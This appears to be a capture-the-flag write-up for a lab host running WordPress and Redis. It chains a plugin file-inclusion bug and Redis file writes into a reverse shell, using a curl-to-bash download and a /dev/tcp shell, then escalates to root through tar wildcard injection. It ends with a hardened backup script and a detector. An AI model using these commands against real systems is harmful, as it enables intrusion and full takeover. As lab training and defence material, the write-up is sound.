Key points:
- WPScan
- Redis + local file inclusion to create a reverse shell
- Privilege escalation via the tar command
- Knowledge of Redis file paths
Detailed steps
Run nmap -p- -sV -A #remote_ip#
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 23:00 UTC
Nmap scan report for #remote_ip#
Host is up (0.00053s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.2
|_http-title: Readys – Just another WordPress site
6379/tcp open redis Redis key-value store
Points worth noting:
- Port 80 is open, with WordPress installed
- Port 6379 is open, with Redis installed
Run wpscan. If a local proxy is in use, add the --proxy parameter; specify the --plugins-detection mode to get a more accurate plugin list.
wpscan --url http://#remote_ip#/ --api-token #api_key# --proxy socks5://#proxy_ip# -e --plugins-detection aggressive
The site-editor 1.1.1 plugin is reported to have an LFI vulnerability:
[+] site-editor
| Location: http://192.168.210.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.210.166/wp-content/plugins/site-editor/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.210.166/wp-content/plugins/site-editor/readme.txt
Googling the PoC for CVE-2018-7422 shows that requesting the following URL exploits the vulnerability:
http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Replacing /etc/passwd with /var/www/html/wp-config.php, /etc/shadow, /home/alice/.ssh/id_rsa and other files all failed, so I set this aside for now.
Turning to Redis, I tried different config file paths and eventually found that /etc/redis/redis.conf could be read, which yielded the Redis password.
Connect to the Redis server with redis-cli, adding slaveof no one to avoid READONLY errors when writing records.
redis-cli -h #remote_ip# -p 6379 -a "Ready4Redis?" slaveof no one
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
redis-cli -h #remote_ip# -p 6379
192.168.241.166:6379>
Trying set/save against paths such as /var/www/html in redis-cli produced errors, so a different path with write permission was needed. Continuing to read files through the LFI vulnerability, /etc/systemd/system/redis.service shows that the path Redis is allowed to write to is /opt/redis-files/.
Next I tried to establish a reverse shell; after several approaches, the following steps succeeded.
- Create poc.sh locally
#!/bin/bash
/bin/bash -i >& /dev/tcp/#local_ip#/9000 0>&1
- Listen on port 9000 with nc
nc -nlvp 9000
- Start a Python HTTP server
python -m http.server 80
- Use redis-cli to create the reverse shell: the written PHP file fetches poc.sh from the Python server on the local machine and executes it
#remote_ip#:6379> config set dir /opt/redis-files
OK
#remote_ip#:6379> config set dbfilename test.php
OK
#remote_ip#:6379> set test "<?php system('curl #local_ip#/poc.sh | bash'); ?>"
OK
#remote_ip#:6379> save
OK
192.168.241.166:6379>
- Visit the following URL in a browser to trigger the reverse shell
http://#remote_ip#/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php
Upload linpeas.sh to the remote server and run it. It reveals the following cron job and shell script, which uses tar to back up the files under /var/www/html periodically:
*/3 * * * * root /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17 2021 /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
Try to abuse tar's checkpoint feature to attach a custom command to the backup.
Run the following commands under /var/www/html. When tar backs up the files under /var/www/html, exploit.sh is executed and sets the SUID bit on /bin/bash:
echo "chmod +s /bin/bash" >exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"
After waiting a few minutes, root privileges are obtained:
alice@readys:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
alice@readys: /bin/bash -p
/bin/bash -p
id
uid=1000(alice) gid=1000(alice) euid=0(root) egid=0(root) groups=0(root),1000(alice)
ls /root
proof.txt
cat /root/proof.txt
892f38a3df377fc50592924a41f10f64
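The root cause of the privilege escalation above is that backup.sh runs `tar -cf ... *`, letting the shell expand file names such as "--checkpoint=1" into tar options. As an added example (not from the original write-up or the target host), here is a hardened replacement for that backup script, plus a check that flags the option-like file names the trick leaves behind; the function names and the /opt/backups destination are assumptions.

```bash
#!/bin/bash
# Added example, hypothetical hardened replacement for backup.sh.
# Defences: (1) file names reach tar only as data, never via shell globbing;
# (2) the backup refuses to run, and logs, if any option-like name exists.
set -eu

# Print every entry under $1 whose name begins with '-' and return 1 if any
# exist. Such names are the tell-tale artefact of the wildcard/checkpoint trick.
find_option_like_names() {
    local root="$1"
    local hits
    hits=$(find "$root" -mindepth 1 -name '-*' -print)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Archive the tree at $1 into $2 (give an absolute path). Names are fed to tar
# through `find -print0 | tar --null -T -`, each prefixed with "./", so a name
# like "--checkpoint-action=exec=..." can never be parsed as an option.
safe_backup() {
    local src="$1" dest="$2"
    ( cd "$src" && find . -mindepth 1 -print0 \
        | tar --null --no-recursion -T - -cf "$dest" )
}

# Replacement for the cron job body: refuse and log if the web root contains
# option-like names (return 2); otherwise archive it safely.
backup_webroot() {
    local webroot="$1" dest="$2"
    if ! find_option_like_names "$webroot" >/dev/null; then
        echo "backup refused: option-like file names under $webroot" >&2
        return 2
    fi
    safe_backup "$webroot" "$dest"
}

# Usage as the cron job would call it (assumed paths from the write-up):
# backup_webroot /var/www/html /opt/backups/website.tar
```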